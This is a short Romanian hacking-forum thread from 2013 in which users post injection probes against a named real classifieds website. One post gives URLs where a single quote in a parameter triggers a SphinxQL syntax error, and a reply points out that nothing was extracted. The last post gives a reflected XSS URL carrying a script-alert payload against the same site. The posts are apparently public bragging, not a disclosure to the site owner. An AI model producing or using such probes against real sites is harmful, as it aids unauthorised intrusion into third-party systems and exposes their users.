Systems Posted August 28, 2013 Report Posted August 28, 2013 (edited) http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=3000&marca=9'sphinxql: syntax error, unexpected $undefined, expecting $end near '' ORDER BY date_approved_ts DESC LIMIT 0,20 OPTION max_matches = 20'http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=3000&cb=1%27 Edited August 28, 2013 by Systems 1 Quote
yoyois Posted August 29, 2013 Report Posted August 29, 2013 E doar o eroare, unde sunt informatiile extrase?Cred ca e mai greu sa nu generezi eroare cu o sintaxa SQL decat sa o generezi.In cazul de fata cred ca se foloseste un vector...Anyway. @System Mai cauta. Mai incearca. Si la viitoarele macar asigura-te ca sunt exploatabile. Quote
TheTime Posted August 29, 2013 Report Posted August 29, 2013 Asta e tot ce am reusit. Nothing else. Quote
coolbyte Posted August 29, 2013 Report Posted August 29, 2013 un xss http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=%27%3Cscript%3Ealert%28%22mata%22%29%3C/script%3Eh3000&cb=1 Quote
